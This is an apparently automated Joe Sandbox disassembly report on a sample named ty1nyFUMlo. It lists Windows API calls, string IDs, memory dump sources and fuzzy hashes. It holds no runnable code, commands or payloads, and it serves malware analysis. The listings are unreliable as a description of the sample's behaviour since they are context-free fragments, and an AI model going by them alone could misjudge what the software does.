                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005772CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                        • String ID: DllGetClassObject
                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                        • Opcode ID: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
                                                                                                                        • Instruction ID: da2a720d7b9e695153c1b04487fd3d582e97116edaf2c8853fbfc902e3e55f44
                                                                                                                        • Opcode Fuzzy Hash: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
                                                                                                                        • Instruction Fuzzy Hash: BE417F75604208EFDB15CF54E884A9A7FB9FF49310F14C4A9BD199F20AD7B0DA44EBA0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 005A5352
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A5375
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A5382
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A53A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3340791633-2594219639
                                                                                                                        • Opcode ID: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
                                                                                                                        • Instruction ID: 25cbc3b5dc07b2c93bd2823fcccbc58678022017fe9f4e6f55f5a47f6e17b9a6
                                                                                                                        • Opcode Fuzzy Hash: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
                                                                                                                        • Instruction Fuzzy Hash: 3331C134A55A08EFEF249E14CC45FEC3F65BB96390F984803FA11961E1E7B09940AB41
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                                        • API String ID: 176396367-4004644295
                                                                                                                        • Opcode ID: 2cade854eb4908f9b374b67b62f35ba981a09a99db2bb01d5779fb6f223a36b7
                                                                                                                        • Instruction ID: 522803fa16ebc2750780e43fed22bc03c45084630453367975b6cd4281c06cd4
                                                                                                                        • Opcode Fuzzy Hash: 2cade854eb4908f9b374b67b62f35ba981a09a99db2bb01d5779fb6f223a36b7
                                                                                                                        • Instruction Fuzzy Hash: 0831F873A0056E4BCF30DF2C99501BE3F91BBA5790F55402AE855AB345F671CE84D7A0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005A2F8D
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 005A2F94
                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005A2FA9
                                                                                                                        • DestroyWindow.USER32(?), ref: 005A2FB1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                        • String ID: SysAnimate32
                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                        • Opcode ID: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
                                                                                                                        • Instruction ID: 96ab904e3b7256b38d47e8eba9819b34847afc57450e7fba80572e2985b0c4f6
                                                                                                                        • Opcode Fuzzy Hash: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
                                                                                                                        • Instruction Fuzzy Hash: CF219A71204209AFEB108F68DC87EBF3BB9FB5A364F104619FA50D6190D771DC91AB60
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 005A56BB
                                                                                                                        • _wcslen.LIBCMT ref: 005A56CD
                                                                                                                        • _wcslen.LIBCMT ref: 005A56D8
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 455545452-2594219639
                                                                                                                        • Opcode ID: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
                                                                                                                        • Instruction ID: 4bcfde3f289dc3d914e2ea0f8c620b45377d4e0ceca0dd4ffae8d9c544bfb49c
                                                                                                                        • Opcode Fuzzy Hash: e992f3e23b6a9c6ffbb7e171d4bece51ceea896cc28284fccf73fd481f471708
                                                                                                                        • Instruction Fuzzy Hash: F611B1716006099ADF20DF658C85EEE7FACFF56760F104426F915DA081FB709A84CBA0
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00516060
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3970641297-2594219639
                                                                                                                        • Opcode ID: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
                                                                                                                        • Instruction ID: b107be61bab182dbec4d44bf95da99212bad452a61abb8ec84958de889274cc6
                                                                                                                        • Opcode Fuzzy Hash: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
                                                                                                                        • Instruction Fuzzy Hash: A611AD72501508BFEF129FA48C48EEABFA9FF1D3A4F000206FA0556110C7329CA0EBA1
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002), ref: 00534D8D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00534DA0
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000), ref: 00534DC3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
                                                                                                                        • Instruction ID: 692752c2c850a5c8ed03e6f098b84b58c0440c771ae0dc7cf6b7e5924add74c1
                                                                                                                        • Opcode Fuzzy Hash: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
                                                                                                                        • Instruction Fuzzy Hash: CDF03C34A40209ABDB119B94DC49BAEBFE5FB54751F0001A5E806A62A0CB70A944DE90
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                        • Opcode ID: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
                                                                                                                        • Instruction ID: 16283ffd9647496279248e6936e60fcdeb8308ace92cc0f5365f1196ffeef1e6
                                                                                                                        • Opcode Fuzzy Hash: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
                                                                                                                        • Instruction Fuzzy Hash: 54E08635B016225BE33117257C18B9F7E58BF93B627050215FC04D2200DB60CD4598A2
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                        • Opcode ID: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
                                                                                                                        • Instruction ID: c00cc8ec08d002cd9b4a5957fddf67c7e2e60ced3bcc97b4d2ec27bf5b7f19f1
                                                                                                                        • Opcode Fuzzy Hash: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
                                                                                                                        • Instruction Fuzzy Hash: 17D0123560262257A7321B257C18DCF7E1CBF87B513050715F905A6214DF61CD46D9E1
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0059A427
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0059A435
                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0059A468
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0059A63D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3488606520-0
                                                                                                                        • Opcode ID: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
                                                                                                                        • Instruction ID: a1d191c2bac256b3c28d0f258f2a557af3329cf0ad95e8c8a8494c0d65edd18f
                                                                                                                        • Opcode Fuzzy Hash: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
                                                                                                                        • Instruction Fuzzy Hash: BCA160716043019FEB20DF24D88AB2ABBE5BF84714F14885DF55A9B3D2DB71EC418B92
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
                                                                                                                        • _free.LIBCMT ref: 0054BB7F
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 0054BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
                                                                                                                        • Instruction ID: 6458ec65f0ef44d81316055b1b86e12903526851099121acaf2fa9c6b05f6472
                                                                                                                        • Opcode Fuzzy Hash: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
                                                                                                                        • Instruction Fuzzy Hash: D951E47190020AABEB14EF669CC59EEBFB8FB90318B10066AE554D7291EB30DE459B50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD
                                                                                                                          • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16
                                                                                                                          • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0057E473
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0057E4AC
                                                                                                                        • _wcslen.LIBCMT ref: 0057E5EB
                                                                                                                        • _wcslen.LIBCMT ref: 0057E603
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0057E650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3183298772-0
                                                                                                                        • Opcode ID: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
                                                                                                                        • Instruction ID: f7b32ffa0406c7e72e17dbb538541a1960531860fa7a35bfe44debbd196d8cad
                                                                                                                        • Opcode Fuzzy Hash: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
                                                                                                                        • Instruction Fuzzy Hash: 125192B24083455BC724DB90E8969DF7BECBFC8340F00492EF689D3151EF75A6889766
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BAA5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BB00
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0059BB63
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0059BBA6
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059BBB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 826366716-0
                                                                                                                        • Opcode ID: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
                                                                                                                        • Instruction ID: cdc935dd82569dc0e844e059fad9d4eec726ddd56382caa8f3be6678c7951da6
                                                                                                                        • Opcode Fuzzy Hash: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
                                                                                                                        • Instruction Fuzzy Hash: 8661B031208241AFE714DF24C594E6ABFE5FF84308F14895CF49A8B2A2DB31ED45CB92
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00578BCD
                                                                                                                        • VariantClear.OLEAUT32 ref: 00578C3E
                                                                                                                        • VariantClear.OLEAUT32 ref: 00578C9D
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00578D10
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00578D3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4136290138-0
                                                                                                                        • Opcode ID: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
                                                                                                                        • Instruction ID: 7c80970e1213464221eb4496de8c75ebeb80294f245bfc2cd8b3f89fe0b275e7
                                                                                                                        • Opcode Fuzzy Hash: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
                                                                                                                        • Instruction Fuzzy Hash: 415159B5A00219EFCB14CF68D894AAABBF8FF8D310B158559E909DB350E730E911CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00588BAE
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00588BDA
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00588C32
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00588C57
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00588C5F
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: e2f24250b5eed848add13db3c6739fc7b70f9e648692a28f488ec06d04aa0c16
• Instruction ID: a19e350f6f286658c5e9b15f55307042e586999b4f5f3ad6ce430dbebeefcec4
• Opcode Fuzzy Hash: e2f24250b5eed848add13db3c6739fc7b70f9e648692a28f488ec06d04aa0c16
• Instruction Fuzzy Hash: 3D514C35A002199FDB05EF64C885AA9BFF5FF89314F098458E849AB362DB31ED51CB90
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00598F40
